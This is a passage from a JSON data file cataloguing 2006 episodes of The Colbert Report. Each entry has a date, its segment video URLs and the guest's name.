        "http://thecolbertreport.cc.com/videos/1pm4i8/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/3f6dmg/boycott",
        "http://thecolbertreport.cc.com/videos/bqqkk9/reagan-dimes"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2006-05-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ddjyzq/intro---5-18-06",
        "http://thecolbertreport.cc.com/videos/q374t3/stephen-colbert-s-guardian-eagles",
        "http://thecolbertreport.cc.com/videos/91osyo/the-word---libya",
        "http://thecolbertreport.cc.com/videos/rvxfth/difference-makers---tim-donnelly",
        "http://thecolbertreport.cc.com/videos/lga95g/fract---this-day-in-stephen-history",
        "http://thecolbertreport.cc.com/videos/jl63dd/ted-daeschler",
        "http://thecolbertreport.cc.com/videos/ddobv8/bears-eat-monkey"
      ],
      "guest": "Ted Daeschler"
    },
    {
      "date": "2006-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/63cmgz/my-first-100-shows--how-i-changed-the-world",
        "http://thecolbertreport.cc.com/videos/dk29ec/the-word---me",
        "http://thecolbertreport.cc.com/videos/sygeud/stone-phillips",
        "http://thecolbertreport.cc.com/videos/oqbssv/helium-balloon-drop",
        "http://thecolbertreport.cc.com/videos/n2keyu/the-in-box---100th-episode"
      ],
      "guest": "Stone Phillips"
    },
    {
      "date": "2006-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0jvvnp/intro---6-6-06",
        "http://thecolbertreport.cc.com/videos/zo00tb/666",
        "http://thecolbertreport.cc.com/videos/fvrhwv/the-word---military",
        "http://thecolbertreport.cc.com/videos/ohdrye/stephen-s-sound-advice---graduation",
        "http://thecolbertreport.cc.com/videos/j42g38/christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/5pxetf/sign-off---666-almost-over"
      ],
      "guest": "Christiane Amanpour"
    },
    {
      "date": "2006-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4y1ae4/intro---6-7-06",
        "http://thecolbertreport.cc.com/videos/krcfjp/balrog",
        "http://thecolbertreport.cc.com/videos/8enhyk/search-for-a-new-black-friend---first-submissions",
        "http://thecolbertreport.cc.com/videos/b9ck5g/the-word---big-deal",
        "http://thecolbertreport.cc.com/videos/q5rrxq/threatdown---bad-heroin",
        "http://thecolbertreport.cc.com/videos/g6gwcq/steve-squyres",
        "http://thecolbertreport.cc.com/videos/l4kbi3/sign-off---vaughniston"
      ],
      "guest": "Steve Squyres"
    },
    {
      "date": "2006-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8vv3c/intro---6-8-06",
        "http://thecolbertreport.cc.com/videos/5h2hdf/good-news-about-terror",
        "http://thecolbertreport.cc.com/videos/9s5g2f/the-word---goooooaaaaaal-",
        "http://thecolbertreport.cc.com/videos/tb1qzm/better-know-a-district---texas--22nd---tom-delay",
        "http://thecolbertreport.cc.com/videos/l9x3is/steve-johnson",
        "http://thecolbertreport.cc.com/videos/irk0rv/honorary-doctor"
      ],
      "guest": "Steve Johnson"
    },
    {
      "date": "2006-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kjiw2u/intro---6-12-06",
        "http://thecolbertreport.cc.com/videos/6ev021/tony-awards",
        "http://thecolbertreport.cc.com/videos/m292m0/on-notice---mort-zuckerman",
        "http://thecolbertreport.cc.com/videos/g6su9g/the-word---tom-delay-s-farewell-address",
        "http://thecolbertreport.cc.com/videos/e9sys9/tip-wag---college-students",
        "http://thecolbertreport.cc.com/videos/1zagcw/robert-f--kennedy-jr-",
        "http://thecolbertreport.cc.com/videos/rklfpc/a-tip-from-stephen-colbert-s-gardening-almanac"
      ],
      "guest": "Robert F. Kennedy Jr."
    },
    {
      "date": "2006-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/04ejnu/intro---6-13-06",
        "http://thecolbertreport.cc.com/videos/g9ijaq/stephen-jr--update",
        "http://thecolbertreport.cc.com/videos/qieya3/the-word---great-f---ing-idea",
        "http://thecolbertreport.cc.com/videos/c3pmq2/nsa-wiretapping",
        "http://thecolbertreport.cc.com/videos/2z4g9m/tim-flannery",
        "http://thecolbertreport.cc.com/videos/15yb0t/feline-bravery"
      ],
      "guest": "Tim Flannery"
    },
    {
      "date": "2006-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6tm6zq/exclusive---better-know-a-district---georgia-s-8th---lynn-westmoreland",
        "http://thecolbertreport.cc.com/videos/ddmy1c/intro---6-14-06",
        "http://thecolbertreport.cc.com/videos/3lnns6/surprise-visit-to-iraq",
        "http://thecolbertreport.cc.com/videos/l28ig3/the-word---license-renewal",
        "http://thecolbertreport.cc.com/videos/tlf8t3/better-know-a-district---georgia-s-8th---lynn-westmoreland",
        "http://thecolbertreport.cc.com/videos/4xe4qw/david-sirota",
        "http://thecolbertreport.cc.com/videos/g3hppv/sign-off---disappearing-act"
      ],
      "guest": "David Sirota"
    },
    {
      "date": "2006-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b9zn8f/intro---6-15-06",
        "http://thecolbertreport.cc.com/videos/69j400/search-for-a-new-black-friend----miami-vice--premiere",
        "http://thecolbertreport.cc.com/videos/kt2s9v/the-word---lock---load",
        "http://thecolbertreport.cc.com/videos/mqgxig/formidable-opponent---guantanamo-bay",
        "http://thecolbertreport.cc.com/videos/p118td/michael-pollan",
        "http://thecolbertreport.cc.com/videos/avxgi1/biggie-ness"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2006-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zww1j/intro---6-19-06",
        "http://thecolbertreport.cc.com/videos/hsj6mj/bill-gates",
        "http://thecolbertreport.cc.com/videos/dattp1/the-word---risky-business",
        "http://thecolbertreport.cc.com/videos/q5w5ph/threatdown---the-homo-sexy-edition",
        "http://thecolbertreport.cc.com/videos/vaw7tx/gustavo-arellano"
      ],
      "guest": "Gustavo Arellano"
    },
    {
      "date": "2006-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wanyh5/intro---6-20-06",
        "http://thecolbertreport.cc.com/videos/t2udf0/marrying-snakes",
        "http://thecolbertreport.cc.com/videos/5kkfzf/the-word---everything-must-go",
        "http://thecolbertreport.cc.com/videos/m05b1x/american-goal",
        "http://thecolbertreport.cc.com/videos/qitmnq/stephen-makes-it-simple---government",
        "http://thecolbertreport.cc.com/videos/yji71b/bart-ehrman",
        "http://thecolbertreport.cc.com/videos/cahdxo/sign-off---i-ll-call-you"
      ],
      "guest": "Bart Ehrman"
    },
    {
      "date": "2006-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ghd1lj/intro---6-21-06",
        "http://thecolbertreport.cc.com/videos/sx1i4m/truthiness-cheer",
        "http://thecolbertreport.cc.com/videos/o652yy/don-t-mess-with-jesus",
        "http://thecolbertreport.cc.com/videos/alty3q/world-cup-trash-talk---alexi-lalas",
        "http://thecolbertreport.cc.com/videos/n3wvrq/tip-wag---episcopal-church",
        "http://thecolbertreport.cc.com/videos/qjlwml/bay-buchanan",
        "http://thecolbertreport.cc.com/videos/k5qunl/sign-off---insane-clown"
      ],
      "guest": "Bay Buchanan"
    },
    {
      "date": "2006-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q057ll/exclusive---better-know-a-district---colorado-s-1st---diana-degette",
        "http://thecolbertreport.cc.com/videos/wjjbzb/intro---6-22-06",
        "http://thecolbertreport.cc.com/videos/f4jomt/stephen-s-fault",
        "http://thecolbertreport.cc.com/videos/21iu1g/stephen-hawking-is-an-a-hole",
        "http://thecolbertreport.cc.com/videos/hfgyhs/the-word---cut-and-run",
        "http://thecolbertreport.cc.com/videos/abdpyq/better-know-a-district---colorado-s-1st---diana-degette",
        "http://thecolbertreport.cc.com/videos/2oh72f/douglas-brinkley",
        "http://thecolbertreport.cc.com/videos/vh4cyy/sign-off---not-winning-prizes"
      ],
      "guest": "Doug Brinkley"
    },
    {
      "date": "2006-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nxwjfg/intro---6-26-06",
        "http://thecolbertreport.cc.com/videos/0au60f/buffett-hires-gates",
        "http://thecolbertreport.cc.com/videos/7xr6qc/medal-of-audacity",
        "http://thecolbertreport.cc.com/videos/wzsdxf/the-word---class-warfare",
        "http://thecolbertreport.cc.com/videos/gb7vwl/all-you-need-to-know---hot-planet",
        "http://thecolbertreport.cc.com/videos/ny0s7o/mark-bowden",
        "http://thecolbertreport.cc.com/videos/7zeule/sign-off---highlights-magazine"
      ],
      "guest": "Mark Bowden"
    },
    {
      "date": "2006-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fqk84n/intro---6-27-06",
        "http://thecolbertreport.cc.com/videos/wmi0fy/flammo-mcburny",
        "http://thecolbertreport.cc.com/videos/jgpsp4/greatest-conservative-rock-songs",
        "http://thecolbertreport.cc.com/videos/5xzyo9/the-word---cold--dead-fingers",
        "http://thecolbertreport.cc.com/videos/nnrjlz/movies-that-are-destroying-america---a-scanner-darkly",
        "http://thecolbertreport.cc.com/videos/360rgd/chris-matthews",
        "http://thecolbertreport.cc.com/videos/iiom30/sign-off---rubber-mop"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2006-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iehmr9/intro---6-28-06",
        "http://thecolbertreport.cc.com/videos/mdix0g/the-smoking-side-dish",
        "http://thecolbertreport.cc.com/videos/luor1n/american-flags",
        "http://thecolbertreport.cc.com/videos/ygvw1r/the-word---superman",
        "http://thecolbertreport.cc.com/videos/9i4qz9/citizens-in-action---fondue-it-yourself",
        "http://thecolbertreport.cc.com/videos/pt4qqj/robert-baer",
        "http://thecolbertreport.cc.com/videos/h13p5y/sign-off---mr--potato-head"
      ],
      "guest": "Robert Baer"
    },
    {
      "date": "2006-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/edzwgb/intro---6-29-06",
        "http://thecolbertreport.cc.com/videos/voqmme/farewell--supreme-court",
        "http://thecolbertreport.cc.com/videos/z39ivs/the-president-s-bff",
        "http://thecolbertreport.cc.com/videos/qzor72/the-word---monkey-butter",
        "http://thecolbertreport.cc.com/videos/ncmucg/difference-makers---steve-pelkey",
        "http://thecolbertreport.cc.com/videos/facpb9/christopher-noxon",
        "http://thecolbertreport.cc.com/videos/9y1lrr/star-jones"
      ],
      "guest": "Christopher Noxon"
    },
    {
      "date": "2006-07-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lp1b85/intro---7-10-06",
        "http://thecolbertreport.cc.com/videos/fweavv/world-cup-co-champions",
        "http://thecolbertreport.cc.com/videos/gud4ld/the-word---silver-foxes",
        "http://thecolbertreport.cc.com/videos/ul4u7x/stephen-s-sound-advice---avoiding-wildfires",
        "http://thecolbertreport.cc.com/videos/hfxzg3/amy-sedaris",
        "http://thecolbertreport.cc.com/videos/izyjak/wilford-brimley-calls---mexico"
      ],
      "guest": "Amy Sedaris"
    },
    {
      "date": "2006-07-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2clwx9/intro---7-11-06",
        "http://thecolbertreport.cc.com/videos/iqeepf/coddling-our-kids",
        "http://thecolbertreport.cc.com/videos/d006ym/the-word---psychopharmaparenting",
        "http://thecolbertreport.cc.com/videos/0go470/stephen-r-a-p-s----talkin--to-kids",
        "http://thecolbertreport.cc.com/videos/wpkhsp/tony-hawk",
        "http://thecolbertreport.cc.com/videos/0eibi7/stephen-colbert-s-world-of-colbertcraft"
      ],
      "guest": "Tony Hawk"
    },
    {
      "date": "2006-07-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ov83sj/exclusive---better-know-a-district---washington-s-2nd---rick-larsen",
        "http://thecolbertreport.cc.com/videos/xl7bdt/intro---7-12-06",
        "http://thecolbertreport.cc.com/videos/t0dd3g/massachusetts---gaysrael",
        "http://thecolbertreport.cc.com/videos/pey6is/the-word---the-america-conventions",
        "http://thecolbertreport.cc.com/videos/67j2yk/better-know-a-district---washington-s-2nd---rick-larsen",
        "http://thecolbertreport.cc.com/videos/pabesh/mort-zuckerman",
        "http://thecolbertreport.cc.com/videos/c4tuhx/sign-off---space-open"
      ],
      "guest": "Mort Zuckerman"
    },
    {
      "date": "2006-07-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rlgq2q/intro---7-13-06",
        "http://thecolbertreport.cc.com/videos/d3xq4i/tv-s-new-low",
        "http://thecolbertreport.cc.com/videos/d45lww/the-word---inquisition",
        "http://thecolbertreport.cc.com/videos/mu9fov/threatdown---gay-clones",
        "http://thecolbertreport.cc.com/videos/42xxhd/ron-suskind"
      ],
      "guest": "Ron Suskind"
    },
    {
      "date": "2006-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q6xn0v/intro---7-17-06",
        "http://thecolbertreport.cc.com/videos/8g7ft7/microphone-on",
        "http://thecolbertreport.cc.com/videos/9s23g8/one-american-dollar",
        "http://thecolbertreport.cc.com/videos/ne3cif/the-word---t---a",
        "http://thecolbertreport.cc.com/videos/mn3izi/tip-wag---arizona",
        "http://thecolbertreport.cc.com/videos/udm6or/lee-silver",
        "http://thecolbertreport.cc.com/videos/yz4kpe/sign-off---lemons"
      ],
      "guest": "Lee Silver"
    },
    {
      "date": "2006-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6nca03/intro---7-18-06",
        "http://thecolbertreport.cc.com/videos/zipmr4/column-width",
        "http://thecolbertreport.cc.com/videos/r9fvrq/wwiii",
        "http://thecolbertreport.cc.com/videos/y08094/the-word---solidarity",
        "http://thecolbertreport.cc.com/videos/dz7igl/stephen-colbert-s-problems-without-solutions---bears",
        "http://thecolbertreport.cc.com/videos/j9c7t7/dhani-jones",
        "http://thecolbertreport.cc.com/videos/eaenq6/try-at-goodbye"
      ],
      "guest": "Dhani Jones"
    },
    {
      "date": "2006-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2v2a4w/intro---7-19-06",
        "http://thecolbertreport.cc.com/videos/wzyudz/veto-virginity",
        "http://thecolbertreport.cc.com/videos/vmqv4k/oprah-and-gayle",
        "http://thecolbertreport.cc.com/videos/zjmkqr/the-word---r-e-s-p-e-c-t",
        "http://thecolbertreport.cc.com/videos/yluk0n/the-convenientest-truth",
        "http://thecolbertreport.cc.com/videos/xndme2/joe-scarborough",
        "http://thecolbertreport.cc.com/videos/3os5ld/sign-off---buck-o-neil"
      ],
      "guest": "Joe Scarborough"
    },
    {
      "date": "2006-07-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vx02e0/exclusive---better-know-a-district---florida-s-19th---robert-wexler",
        "http://thecolbertreport.cc.com/videos/e2w8gi/intro---7-20-06",
        "http://thecolbertreport.cc.com/videos/bpcz93/search-for-a-new-black-friend---friend-exchange-rate",
        "http://thecolbertreport.cc.com/videos/flwcdv/julian-bond",
        "http://thecolbertreport.cc.com/videos/8oaiw2/better-know-a-district---florida-s-19th---robert-wexler",
        "http://thecolbertreport.cc.com/videos/naagf7/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/8yx1of/one-regret"
      ],
      "guest": "Tom Brokaw"
    },
    {
      "date": "2006-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8l2dhx/intro---7-24-06",
        "http://thecolbertreport.cc.com/videos/b9z8jn/celebrating-america-s-kick-assedness",
        "http://thecolbertreport.cc.com/videos/mchynh/war---",
        "http://thecolbertreport.cc.com/videos/qpue58/the-word---moral-minority",
        "http://thecolbertreport.cc.com/videos/zo2o8b/threatdown---camp",
        "http://thecolbertreport.cc.com/videos/0xazqv/howell-raines",
        "http://thecolbertreport.cc.com/videos/530hq6/sign-off---proud"
      ],
      "guest": "Howell Raines"
    },
    {
      "date": "2006-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3bdqam/intro---7-25-06",
        "http://thecolbertreport.cc.com/videos/qik373/all-red-states",
        "http://thecolbertreport.cc.com/videos/mdzpjk/morning-shows",
        "http://thecolbertreport.cc.com/videos/e4fmv9/the-word---opposite-day",
        "http://thecolbertreport.cc.com/videos/bqr3op/formidable-opponent---stem-cell-research",
        "http://thecolbertreport.cc.com/videos/6xp57g/william-donohue",
        "http://thecolbertreport.cc.com/videos/wfh0qw/sign-off---food-for-thought"
      ],
      "guest": "William Donohue"
    },
    {
      "date": "2006-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sz2q6w/intro---7-26-06",
        "http://thecolbertreport.cc.com/videos/a62j0l/stephen-s-family-tree",
        "http://thecolbertreport.cc.com/videos/nxih1e/rescue-stephen-jr-",
        "http://thecolbertreport.cc.com/videos/b9kj0d/the-word---democrazy",
        "http://thecolbertreport.cc.com/videos/2wr9gw/stephen-s-sound-advice---blackouts",
        "http://thecolbertreport.cc.com/videos/ym3t0d/neal-katyal",
        "http://thecolbertreport.cc.com/videos/9nk4r7/sign-off---super-hero-stamps"
      ],
      "guest": "Neal Katyal"
    },
    {
      "date": "2006-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bgxe8v/exclusive---better-know-a-district---district-of-columbia---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/jdsi7h/intro---7-27-06",
        "http://thecolbertreport.cc.com/videos/2pti2w/floyd-landis--balls",
        "http://thecolbertreport.cc.com/videos/0qi0dm/the-word---secretary-general-bolton",
        "http://thecolbertreport.cc.com/videos/6quypd/better-know-a-district---district-of-columbia---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/a2w76v/joe-quesada"
      ],
      "guest": "Joe Quesada"
    },
    {
      "date": "2006-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2k66vv/intro---7-31-06",
        "http://thecolbertreport.cc.com/videos/ipm2dm/book-club",
        "http://thecolbertreport.cc.com/videos/3jl3pu/bicycle-theft",
        "http://thecolbertreport.cc.com/videos/z1aahs/the-word---wikiality",
        "http://thecolbertreport.cc.com/videos/zqod1f/tip-wag---lance-bass",
        "http://thecolbertreport.cc.com/videos/6tak7c/ned-lamont"
      ],
      "guest": "Ned Lamont"
    },
    {
      "date": "2006-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b1r2b5/intro---8-1-06",
        "http://thecolbertreport.cc.com/videos/advrej/courting-joe-lieberman",
        "http://thecolbertreport.cc.com/videos/n4ao8r/cuba-libre",
        "http://thecolbertreport.cc.com/videos/uqnkmr/the-word---uncool",
        "http://thecolbertreport.cc.com/videos/kxcfet/balls-for-kidz---carnivals",
        "http://thecolbertreport.cc.com/videos/pcfi97/peter-beinart",
        "http://thecolbertreport.cc.com/videos/wm5ib9/sign-off---energy"
      ],
      "guest": "Peter Beinart"
    },
    {
      "date": "2006-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7ofk8i/intro---8-2-06",
        "http://thecolbertreport.cc.com/videos/1jctl5/chair-for-joe-lieberman",
        "http://thecolbertreport.cc.com/videos/tc2zff/on-notice---how-the-on-notice-board-is-made",
        "http://thecolbertreport.cc.com/videos/9f950b/the-word---single-serving",
        "http://thecolbertreport.cc.com/videos/1gkx3r/no-joe-lieberman",
        "http://thecolbertreport.cc.com/videos/m7siat/linda-hirshman",
        "http://thecolbertreport.cc.com/videos/kx6zql/sign-off---cocoa-puffs"
      ],
      "guest": "Linda Hirshman"
    },
    {
      "date": "2006-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dij1sw/war--what-it-s-good-for---intro",
        "http://thecolbertreport.cc.com/videos/gdp73x/war--what-it-s-good-for---russ-lieber",
        "http://thecolbertreport.cc.com/videos/xzhg3v/meet-an-ally---palau",
        "http://thecolbertreport.cc.com/videos/o6s4zb/paul-hackett",
        "http://thecolbertreport.cc.com/videos/cujsej/war--what-it-s-good-for---the-eternal-flame"
      ],
      "guest": "Paul Hackett"
    },
    {
      "date": "2006-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ggdajm/intro---8-8-06",
        "http://thecolbertreport.cc.com/videos/oafdpt/lieberman-no-show",
        "http://thecolbertreport.cc.com/videos/kend9g/press-room-renovations",
        "http://thecolbertreport.cc.com/videos/cru76e/the-word---ten-hut-",
        "http://thecolbertreport.cc.com/videos/ywy5cq/tek-jansen---operation--heart-of-the-phoenix---dead-or-alive",
        "http://thecolbertreport.cc.com/videos/y3ycer/bill-rhoden",
        "http://thecolbertreport.cc.com/videos/h498ah/sign-off---toss-to-jon"
      ],
      "guest": "Bill Rhoden"
    },
    {
      "date": "2006-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ku3ic/intro---8-9-06",
        "http://thecolbertreport.cc.com/videos/m3m7kz/lieberman-loses",
        "http://thecolbertreport.cc.com/videos/coxidl/delay-and-jesus",
        "http://thecolbertreport.cc.com/videos/9jopn4/the-word---pencils-down",
        "http://thecolbertreport.cc.com/videos/hpijh0/tip-wag---hungarian-bridge",
        "http://thecolbertreport.cc.com/videos/p3g7eb/alexandra-robbins"
      ],
      "guest": "Alexandra Robbins"
    },
    {
      "date": "2006-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/75wf4h/exclusive---better-know-a-district---california-s-6th---lynn-woolsey-pt--1",
        "http://thecolbertreport.cc.com/videos/m276r1/exclusive---better-know-a-district---california-s-6th---lynn-woolsey-pt--2",
        "http://thecolbertreport.cc.com/videos/8ku3ic/intro---8-9-06",
        "http://thecolbertreport.cc.com/videos/m3m7kz/lieberman-loses",
        "http://thecolbertreport.cc.com/videos/coxidl/delay-and-jesus",
        "http://thecolbertreport.cc.com/videos/9jopn4/the-word---pencils-down",
        "http://thecolbertreport.cc.com/videos/hpijh0/tip-wag---hungarian-bridge",
        "http://thecolbertreport.cc.com/videos/p3g7eb/alexandra-robbins"
      ],
      "guest": "Eli Pariser"
    },
    {
      "date": "2006-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qehfxb/intro---8-10-06",
        "http://thecolbertreport.cc.com/videos/6kvez0/liquids-on-planes",
        "http://thecolbertreport.cc.com/videos/b2svxe/the-word---cappuccino",
        "http://thecolbertreport.cc.com/videos/fyj6zj/better-know-a-district---california-s-6th---lynn-woolsey",
        "http://thecolbertreport.cc.com/videos/d573ty/eli-pariser",
        "http://thecolbertreport.cc.com/videos/hjpfzb/sign-off---remedy-for-insomnia"
      ],
      "guest": "Eli Pariser"
    },
    {
      "date": "2006-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/voo1ci/intro---8-14-06",
        "http://thecolbertreport.cc.com/videos/8c9998/peaceland",
        "http://thecolbertreport.cc.com/videos/mjxd75/french-fries",
        "http://thecolbertreport.cc.com/videos/bghbjx/jon-s-apology",
        "http://thecolbertreport.cc.com/videos/ozm5pk/stephen-s-sound-advice---protecting-your-online-identity",
        "http://thecolbertreport.cc.com/videos/u393jw/ramesh-ponnuru",
        "http://thecolbertreport.cc.com/videos/2b5c2u/sign-off---e-mail-password"
      ],
      "guest": "Ramesh Ponnuru"
    },
    {
      "date": "2006-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8rzc5/intro---8-15-06",
        "http://thecolbertreport.cc.com/videos/95fbpq/sharing-the-spotlight-with-ahmadinejad",
        "http://thecolbertreport.cc.com/videos/6qb0k5/the-word---dumb-ocracy",
        "http://thecolbertreport.cc.com/videos/2evzvd/hungarian-bridge-progress-report",
        "http://thecolbertreport.cc.com/videos/mjhnvj/all-you-need-to-know---proper-condom-use",
        "http://thecolbertreport.cc.com/videos/jdgp1k/david-gergen"
      ],
      "guest": "David Gergen"
    },
    {
      "date": "2006-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5nmn6o/intro---8-16-06",
        "http://thecolbertreport.cc.com/videos/ic96lx/alan-schlesinger",
        "http://thecolbertreport.cc.com/videos/lsglfu/the-word---el-comandante",
        "http://thecolbertreport.cc.com/videos/gb4665/let-s-make-this-happen",
        "http://thecolbertreport.cc.com/videos/2ap7v2/was-it-really-that-bad----cold-war",
        "http://thecolbertreport.cc.com/videos/5uanam/morgan-spurlock",
        "http://thecolbertreport.cc.com/videos/9nqss3/sign-off---historic-hoax"
      ],
      "guest": "Morgan Spurlock"
    },
    {
      "date": "2006-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b66unq/intro---8-17-06",
        "http://thecolbertreport.cc.com/videos/xzzu7h/continuity",
        "http://thecolbertreport.cc.com/videos/75yefr/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/kc21ru/better-know-a-district---california-s-31st",
        "http://thecolbertreport.cc.com/videos/8n3z7e/better-know-a-district---california-s-31st---javier-becerra",
        "http://thecolbertreport.cc.com/videos/nsqwib/neil-young"
      ],
      "guest": "Neil Young"
    },
    {
      "date": "2006-08-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uz7rxo/intro---8-21-06",
        "http://thecolbertreport.cc.com/videos/vzigy3/green-screen-challenge---the-announcement",
        "http://thecolbertreport.cc.com/videos/u468bk/atheists-in-foxholes",
        "http://thecolbertreport.cc.com/videos/pqlyj1/the-word---side-effects",
        "http://thecolbertreport.cc.com/videos/euqtan/threatdown---drivers-eat",
        "http://thecolbertreport.cc.com/videos/btgfsr/geoffrey-nunberg",
        "http://thecolbertreport.cc.com/videos/6p8hy2/sign-off---pants-off"
      ],
      "guest": "Geoffrey Nunberg"
    },
    {
      "date": "2006-08-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5huhm/intro---8-22-06",
        "http://thecolbertreport.cc.com/videos/xr6owy/cheating-death---fields-medal",
        "http://thecolbertreport.cc.com/videos/p4wf5t/the-word---99-problems",
        "http://thecolbertreport.cc.com/videos/8t1wv1/stephen-colbert-salutes-hungary",
        "http://thecolbertreport.cc.com/videos/6iv4i1/paul-krugman"
      ],
      "guest": "Paul Krugman"
    },
    {
      "date": "2006-08-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rsqkbw/american-pop-culture--it-s-crumbelievable----intro",
        "http://thecolbertreport.cc.com/videos/85w92g/american-pop-culture--it-s-crumbelievable----pop-culture-icons",
        "http://thecolbertreport.cc.com/videos/l7z3b3/damian-kulash",
        "http://thecolbertreport.cc.com/videos/19r90f/american-pop-culture--it-s-crumbelievable----cable-tv-vs--the-american-family",
        "http://thecolbertreport.cc.com/videos/9h0pam/gideon-yago",
        "http://thecolbertreport.cc.com/videos/l29lto/american-pop-culture--it-s-crumbelievable----stephen-steps-up"
      ],
      "guest": "Gideon Yago"
    },
    {
      "date": "2006-08-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/86h1lx/intro---8-24-06",
        "http://thecolbertreport.cc.com/videos/j3gjfh/national-peach-month",
        "http://thecolbertreport.cc.com/videos/8avj2z/fart-jokes",
        "http://thecolbertreport.cc.com/videos/ejrivu/the-word---bad-boys",
        "http://thecolbertreport.cc.com/videos/sui137/30-days-with-the-colbert-report",
        "http://thecolbertreport.cc.com/videos/dw0hc5/janna-levin",
        "http://thecolbertreport.cc.com/videos/8v6ak5/green-screen-challenge---socialized-medicine"
      ],
      "guest": "Janna Levin"
    },
    {
      "date": "2006-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e2o0vm/intro---9-11-06",
        "http://thecolbertreport.cc.com/videos/ryb1sd/manilow-s-emmy",
        "http://thecolbertreport.cc.com/videos/vnwrl5/the-word---shall",
        "http://thecolbertreport.cc.com/videos/epkjf1/the-path-to-9-11",
        "http://thecolbertreport.cc.com/videos/dpqisf/martin-short",
        "http://thecolbertreport.cc.com/videos/0giino/sign-off---lullaby-clap"
      ],
      "guest": "Martin Short"
    },
    {
      "date": "2006-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zj5aco/exclusive---better-know-a-challenger---new-jersey-s-3rd---richard-sexton",
        "http://thecolbertreport.cc.com/videos/2vdm17/intro---9-12-06",
        "http://thecolbertreport.cc.com/videos/fuhxnz/green-screen-challenge---entry",
        "http://thecolbertreport.cc.com/videos/464nde/the-word---missed-opportunity",
        "http://thecolbertreport.cc.com/videos/03wv59/better-know-a-challenger---new-jersey-s-3rd---richard-sexton",
        "http://thecolbertreport.cc.com/videos/uyjgfx/toby-keith",
        "http://thecolbertreport.cc.com/videos/df7axm/sign-off---special-episode"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2006-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9h47r2/intro---9-13-06",
        "http://thecolbertreport.cc.com/videos/a7pf2u/the-colmandos",
        "http://thecolbertreport.cc.com/videos/fftk8t/the-word---caveat-emptor",
        "http://thecolbertreport.cc.com/videos/yr3sze/formidable-opponent---iraq-withdrawal",
        "http://thecolbertreport.cc.com/videos/io94jl/ken-jennings",
        "http://thecolbertreport.cc.com/videos/m6mk95/sign-off---cigarettes"
      ],
      "guest": "Ken Jennings"
    },
    {
      "date": "2006-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3i56pi/intro---9-14-06",
        "http://thecolbertreport.cc.com/videos/m82cj5/sexy-photo",
        "http://thecolbertreport.cc.com/videos/39njye/george-allen",
        "http://thecolbertreport.cc.com/videos/dmk6s2/hungarian-bridge---andras-simonyi",
        "http://thecolbertreport.cc.com/videos/ogtff2/tip-wag---nasa",
        "http://thecolbertreport.cc.com/videos/6xq5fv/bill-simmons",
        "http://thecolbertreport.cc.com/videos/czqyfe/sign-off---get-on-it--nation",
        "http://thecolbertreport.cc.com/videos/g844xc/bridge-contest"
      ],
      "guest": "Bill Simmons"
    },
    {
      "date": "2006-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wteen9/intro---9-18-06",
        "http://thecolbertreport.cc.com/videos/51grfw/whitney-houston",
        "http://thecolbertreport.cc.com/videos/82m3g9/the-word---wiper-fluid",
        "http://thecolbertreport.cc.com/videos/cyd2um/tek-jansen---operation--destiny-s-underbelly--entrapped-",
